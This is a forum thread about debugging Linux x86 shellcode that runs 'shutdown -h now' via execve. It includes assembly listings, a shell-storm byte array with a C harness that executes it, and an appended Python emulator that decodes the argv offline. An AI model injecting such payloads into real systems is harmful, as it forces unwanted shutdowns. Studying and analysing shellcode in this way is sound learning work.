pcfx Posted July 19, 2016 (edited)

Hi, I wrote a simple shellcode which executes /sbin/shutdown via sys_execve. When I execute it in my Ubuntu VM it doesn't shut down completely but remains in the 'shutdown state' (see attachment). My shellcode length is 51 bytes. I also tried a shellcode example from shell-storm.org which is 56 bytes, but the result was the same. Also I think the following 3 lines (5 bytes) in the shell-storm shellcode are not necessary, but I might be wrong..

```
8048062: 31 d2    xor edx,edx
8048069: 89 e7    mov edi,esp
804808f: 56       push esi
```

EDIT: Hm well I guess it's necessary to XOR the edx register because I found this in the man pages:

> Both argv and envp must be terminated by a NULL pointer.

..and edx should point to the envp string array, correct? Even so it would work without XOR'ing the edx register, but this is because edx is already 0x00000000 (by accident?). I also saw very short shellcodes using sys_execve where they didn't use the edx register at all. Is XOR'ing the edx register equivalent to 'terminated by a NULL pointer' and to the following piece of assembly code:

```asm
xor eax, eax
push eax
mov edx, esp
```

This is my shellcode (51 bytes): EDIT: I updated the shellcode. It's now 53 bytes.

```asm
BITS 32
global _start
section .text
_start:
    xor eax, eax
    xor edx, edx                ; EDITED!
    push eax
    push word 0x682d
    push eax
    push 0x6e
    mov word [esp+0x1], 0x776f  ; "ow" (operand as in the shell-storm listing)
    mov edi, esp
    push eax
    push 0x6e776f64
    push 0x74756873
    push 0x2f2f2f6e
    push 0x6962732f
    mov ebx, esp
    push eax
    push edi
    push ebx
    mov ecx, esp
    mov al, 0xb
    int 0x80
```

When I type 'sudo shutdown -h now' the VM is shutting down completely. Can anybody explain why?

Edited July 19, 2016 by pcfx
Extreme Coders Posted July 19, 2016 (edited)

The command to shutdown and poweroff is shutdown -h now. However the shellcode is only passing shutdown now (without -h). You can verify this with strace. The following shellcode should work:

```asm
BITS 32
global _start
section .text
_start:
    xor eax, eax
    xor edx, edx            ; envp
    push eax
    push word 0x682d        ; -h
    mov edi, esp
    push eax
    push byte 0x6e          ; now
    mov [esp+1], word 0x776f
    mov esi, esp
    push eax
    push 0x6e776f64         ; /sbin/shutdown
    push 0x74756873
    push 0x2f2f2f6e
    push 0x6962732f
    mov ebx, esp
    push edx                ; null envp
    push esi                ; now null
    push edi                ; -h null
    push ebx                ; /sbin/shutdown null
    mov ecx, esp
    mov al, 11
    int 0x80
```

Edited July 19, 2016 by Extreme Coders
pcfx (Author) Posted July 19, 2016 (edited)

Ok I see what I did wrong, thanks man, it works now! Anyway there is a typing mistake in the shell-storm shellcode. He uses the edi register twice. Corrected instruction in the comment.

```c
/*
; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)

Disassembly of section .text:

08048060 <_start>:
 8048060: 31 c0                   xor    eax,eax
 8048062: 31 d2                   xor    edx,edx
 8048064: 50                      push   eax
 8048065: 66 68 2d 68             pushw  0x682d
 8048069: 89 e7                   mov    edi,esp
 804806b: 50                      push   eax
 804806c: 6a 6e                   push   0x6e
 804806e: 66 c7 44 24 01 6f 77    mov    WORD PTR [esp+0x1],0x776f
 8048075: 89 e7                   mov    edi,esp        ; mov esi, esp
 8048077: 50                      push   eax
 8048078: 68 64 6f 77 6e          push   0x6e776f64
 804807d: 68 73 68 75 74          push   0x74756873
 8048082: 68 6e 2f 2f 2f          push   0x2f2f2f6e
 8048087: 68 2f 73 62 69          push   0x6962732f
 804808c: 89 e3                   mov    ebx,esp
 804808e: 52                      push   edx
 804808f: 56                      push   esi
 8048090: 57                      push   edi
 8048091: 53                      push   ebx
 8048092: 89 e1                   mov    ecx,esp
 8048094: b0 0b                   mov    al,0xb
 8048096: cd 80                   int    0x80
*/

#include <stdio.h>
#include <string.h>

unsigned char code[] =
"\x31\xc0\x31\xd2\x50\x66\x68\x2d"
"\x68\x89\xe7\x50\x6a\x6e\x66\xc7"
"\x44\x24\x01\x6f\x77\x89\xe7\x50"
"\x68\x64\x6f\x77\x6e\x68\x73\x68"
"\x75\x74\x68\x6e\x2f\x2f\x2f\x68"
"\x2f\x73\x62\x69\x89\xe3\x52\x56"
"\x57\x53\x89\xe1\xb0\x0b\xcd\x80";

int main()
{
    printf("Shellcode Length: %d\n", (int)strlen(code));
    /* Jump into the byte array; needs an executable stack/data section to run. */
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}
```

Edited July 19, 2016 by pcfx
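Extreme Coders suggests checking with strace which argv the shellcode really passes; the same check can be done offline, without running the bytes, by walking the handful of instruction forms these execve shellcodes use. The following is an added example, not code from the thread or from shell-storm: a toy emulator over the quoted 56-byte listing that recovers path, argv and envp as they stand at the int 0x80, showing the missing "-h" and the effect of the mov esi, esp correction pcfx points out (the FIXED constant, the byte offset and the function names are my own).

```python
import struct
# The 56-byte shell-storm shellcode exactly as quoted in the C array above (constructed input).
SHELLSTORM = (b"\x31\xc0\x31\xd2\x50\x66\x68\x2d\x68\x89\xe7\x50\x6a\x6e\x66\xc7"
              b"\x44\x24\x01\x6f\x77\x89\xe7\x50\x68\x64\x6f\x77\x6e\x68\x73\x68"
              b"\x75\x74\x68\x6e\x2f\x2f\x2f\x68\x2f\x73\x62\x69\x89\xe3\x52\x56"
              b"\x57\x53\x89\xe1\xb0\x0b\xcd\x80")
# Same bytes with pcfx's correction: the second "mov edi, esp" (89 e7 at offsets 21-22) becomes "mov esi, esp" (89 e6).
FIXED = SHELLSTORM[:22] + b"\xe6" + SHELLSTORM[23:]
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # register numbering used by the opcodes

def emulate(code, stack_size=256):
    # Toy x86 interpreter for the instruction forms used here; stack addresses are offsets into mem.
    r = dict.fromkeys(REGS, 0)
    r["esp"], mem = stack_size, bytearray(stack_size)
    def push(data):
        r["esp"] -= len(data); mem[r["esp"]:r["esp"] + len(data)] = data
    i = 0
    while i < len(code):
        op, m = code[i], code[i + 1] if i + 1 < len(code) else 0
        if op == 0x31 and m >= 0xC0 and (m >> 3) & 7 == m & 7:    # xor reg, reg -> zero it
            r[REGS[m & 7]] = 0; i += 2
        elif 0x50 <= op <= 0x57:                                    # push r32
            push(struct.pack("<I", r[REGS[op - 0x50]])); i += 1
        elif op == 0x68:                                            # push imm32
            push(code[i + 1:i + 5]); i += 5
        elif op == 0x6A:                                            # push imm8 (sign-extended to 4 bytes)
            push(struct.pack("<i", struct.unpack("<b", code[i + 1:i + 2])[0])); i += 2
        elif code[i:i + 2] == b"\x66\x68":                          # push imm16 (only 2 bytes land on the stack)
            push(code[i + 2:i + 4]); i += 4
        elif code[i:i + 4] == b"\x66\xc7\x44\x24":                  # mov word [esp+disp8], imm16
            off = r["esp"] + struct.unpack("<b", code[i + 4:i + 5])[0]
            mem[off:off + 2] = code[i + 5:i + 7]; i += 7
        elif op == 0x89 and 0xE0 <= m <= 0xE7:                      # mov r32, esp
            r[REGS[m & 7]] = r["esp"]; i += 2
        elif op == 0xB0:                                            # mov al, imm8
            r["eax"] = (r["eax"] & ~0xFF) | m; i += 2
        elif code[i:i + 2] == b"\xcd\x80":                          # int 0x80: stop at the syscall
            return r, mem
        else:
            raise ValueError(f"unsupported instruction at offset {i}: {code[i:i + 2].hex()}")
    raise ValueError("no int 0x80 reached")

def cstr(mem, addr):
    return bytes(mem[addr:mem.index(b"\x00", addr)]).decode()

def execve_args(code):
    # What the kernel would receive: ebx = path, ecx = argv (NULL-terminated), edx = envp.
    r, mem = emulate(code)
    argv, p = [], r["ecx"]
    while (ptr := struct.unpack("<I", mem[p:p + 4])[0]) != 0:
        argv.append(cstr(mem, ptr)); p += 4
    return cstr(mem, r["ebx"]), argv, r["edx"] == 0   # third item: is envp passed as NULL?
```

With the quoted bytes the argv comes out as ["/sbin///shutdown", "now"] because esi is still zero when pushed; with the one-byte correction it is ["/sbin///shutdown", "-h", "now"], matching Extreme Coders' diagnosis.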